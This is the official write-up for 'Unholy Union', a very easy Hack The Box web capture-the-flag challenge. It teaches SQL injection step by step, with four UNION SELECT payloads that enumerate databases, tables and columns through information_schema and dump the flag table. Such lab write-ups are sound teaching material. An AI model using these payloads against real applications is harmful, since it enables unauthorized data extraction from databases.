ctf-resources/htb/hacktheboo2024/web/web_unholy_union/README.md

2 KiB

img

Unholy Union 20th Oct 2024 / Document No. D24.xxx.xxx

Prepared By: Xclow3n

Challenge Author: Xclow3n

Difficulty: Very Easy

Classification: Official

Synopsis

Unholy Union is a very easy web challenge designed to help players understand and exploit SQL Injection.

Skills Required

  • Basic knowledge of SQL

Skills Learned

  • SQL Injection

Solution

Visiting the web app displays the following page: img

We can perform a search, which updates the SQL query, and clicking the search button shows the results in both the web app and the debug window. img

Let's add a quote to see if we can break out of the SQL query and inject our own commands. img

We get a syntax error, which means we can inject SQL. Let's retrieve all the existing databases using the following query:

Gun' UNION SELECT NULL, NULL, NULL, NULL, (SELECT GROUP_CONCAT(SCHEMA_NAME) FROM information_schema.schemata) -- -

img

Running this query shows a database named halloween_inventory in addition to the default ones.

Next, let's fetch all the tables in this database with the following query:

Gun' UNION SELECT NULL, NULL, NULL, NULL, (SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA='halloween_inventory') -- -

img

We see a table named flag. Now, let's find the columns in this table to retrieve data. Use this query:

Gun' UNION SELECT NULL, NULL, NULL, NULL, (SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.columns WHERE table_name='flag') -- -

img

Now that we know the column and table names, let's fetch the flag using this query:

Gun' UNION SELECT NULL, NULL, NULL, NULL, (SELECT GROUP_CONCAT(flag) FROM flag) -- -

img

This completes the challenge! :)